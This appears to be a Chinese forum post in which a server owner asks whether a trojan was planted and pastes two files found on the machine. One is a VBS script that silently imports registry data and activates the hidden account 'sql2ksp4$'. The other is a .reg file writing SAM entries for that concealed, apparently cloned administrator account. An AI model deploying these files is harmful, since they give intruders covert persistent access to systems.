服务器是不是给种马了多了VBS与注册文件
1.vbs文件内容
set Cleaner=createobject("wscript.shell")
set wshshell=createobject ("wscript.shell" )
Cleaner.run "regedit /s 2.reg",vbhide
a=wshshell.run ("cmd.exe /c net user sql2ksp4$ /active:yes",0)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Sql2ksp4$]
@=hex(417):
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000417]
"F"=hex:02,00,01,00,00,00,00,00,7e,70,24,c1,30,06,cb,01,00,00,00,00,00,00,00,\
00,90,ee,76,e3,fc,9e,ca,01,00,00,00,00,00,00,00,00,92,73,64,70,1c,ec,ca,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,f9,00,01,00,00,00,00,\
00,00,00,b1,d4,61,f5
"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,12,00,00,00,00,00,00,\
00,d0,00,00,00,12,00,00,00,00,00,00,00,e4,00,00,00,00,00,00,00,00,00,00,00,\
e4,00,00,00,00,00,00,00,00,00,00,00,e4,00,00,00,00,00,00,00,00,00,00,00,e4,\
00,00,00,00,00,00,00,00,00,00,00,e4,00,00,00,00,00,00,00,00,00,00,00,e4,00,\
00,00,00,00,00,00,00,00,00,00,e4,00,00,00,00,00,00,00,00,00,00,00,e4,00,00,\
00,00,00,00,00,00,00,00,00,e4,00,00,00,15,00,00,00,a8,00,00,00,fc,00,00,00,\
08,00,00,00,01,00,00,00,04,01,00,00,14,00,00,00,00,00,00,00,18,01,00,00,14,\
00,00,00,00,00,00,00,2c,01,00,00,04,00,00,00,00,00,00,00,30,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,58,00,03,00,00,00,00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,\
00,00,12,22,7b,fe,69,24,a7,50,95,5e,35,c8,17,04,00,00,00,00,18,00,ff,07,0f,\
00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,1b,03,02,00,\
01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,53,00,71,00,6c,00,\
32,00,6b,00,73,00,70,00,34,00,24,00,00,00,53,00,71,00,6c,00,32,00,6b,00,73,\
00,70,00,34,00,24,00,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,ff,ff,71,40,35,01,02,00,00,07,00,00,00,01,00,01,00,ab,36,e7,be,a0,\
cf,cd,35,1a,71,40,35,54,86,bd,b0,01,00,01,00,34,25,4c,de,46,24,7a,b3,67,52,\
c5,e0,5a,7f,a9,8a,01,00,01,00,01,00,01,00